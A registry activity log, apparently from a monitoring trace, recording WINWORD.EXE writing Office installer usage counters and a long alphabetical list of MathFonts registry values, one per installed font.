HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1298661404
2916
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1298661403
2916
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1298661404
2916
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1298661420
2916
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1298661421
2916
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1298661422
2916
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1298661423
2916
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1298661424
2916
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1298661425
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Arial Unicode MS
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Batang
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@BatangChe
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DFKai-SB
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Dotum
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DotumChe
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@FangSong
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gulim
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GulimChe
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gungsuh
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GungsuhChe
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@KaiTi
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Malgun Gothic
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo UI
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft JhengHei
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft YaHei
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS-ExtB
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU-ExtB
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Gothic
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Mincho
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PGothic
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PMincho
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS UI Gothic
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@NSimSun
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU-ExtB
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimHei
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun-ExtB
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Agency FB
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aharoni
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Algerian
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Andalus
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Angsana New
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
AngsanaUPC
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aparajita
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arabic Typesetting
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Black
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Narrow
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Rounded MT Bold
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Unicode MS
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Baskerville Old Face
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Batang
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BatangChe
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bauhaus 93
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bell MT
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB Demi
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bernard MT Condensed
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Blackadder ITC
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Black
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Condensed
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Poster Compressed
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Book Antiqua
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookman Old Style
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookshelf Symbol 7
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bradley Hand ITC
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Britannic Bold
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Broadway
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Browallia New
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BrowalliaUPC
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Brush Script MT
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Californian FB
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calisto MT
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria Math
1
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Candara
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Castellar
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Centaur
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Gothic
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Schoolbook
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Chiller
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Colonna MT
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Comic Sans MS
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Consolas
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Constantia
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cooper Black
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Bold
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Light
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Corbel
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cordia New
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
CordiaUPC
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Courier
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Courier New
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Curlz MT
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DaunPenh
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
David
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DFKai-SB
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DilleniaUPC
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DokChampa
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Dotum
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DotumChe
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ebrima
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Edwardian Script ITC
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Elephant
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Engravers MT
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Bold ITC
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Demi ITC
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Light ITC
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Medium ITC
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Estrangelo Edessa
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
EucrosiaUPC
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Euphemia
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FangSong
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Felix Titling
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Fixedsys
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Footlight MT Light
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Forte
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Book
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi Cond
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Heavy
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium Cond
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FrankRuehl
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FreesiaUPC
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Freestyle Script
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
French Script MT
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gabriola
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Garamond
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gautami
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Georgia
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gigi
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Condensed
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Ext Condensed Bold
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold Condensed
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gisha
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gloucester MT Extra Condensed
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Old Style
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Stout
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gulim
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GulimChe
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gungsuh
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GungsuhChe
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Haettenschweiler
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harlow Solid Italic
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harrington
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
High Tower Text
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Impact
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Imprint MT Shadow
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Informal Roman
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
IrisUPC
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Iskoola Pota
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
JasmineUPC
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Jokerman
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Juice ITC
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KaiTi
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kalinga
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kartika
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Khmer UI
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KodchiangUPC
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kokila
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kristen ITC
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kunstler Script
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lao UI
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Latha
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Leelawadee
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Levenim MT
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
LilyUPC
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Bright
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Calligraphy
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Console
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Fax
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Handwriting
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Typewriter
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Unicode
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Magneto
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Maiandra GD
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Malgun Gothic
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mangal
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Marlett
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Matura MT Script Capitals
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo UI
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Himalaya
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft JhengHei
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft New Tai Lue
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft PhagsPa
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Sans Serif
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Tai Le
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Uighur
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft YaHei
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Yi Baiti
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS-ExtB
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU-ExtB
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam Fixed
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mistral
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Modern No. 20
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mongolian Baiti
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Monotype Corsiva
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MoolBoran
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Gothic
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Mincho
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Outlook
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PGothic
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PMincho
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Sans Serif
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Specialty
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Sans Serif
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Serif
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS UI Gothic
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MT Extra
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MV Boli
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Narkisim
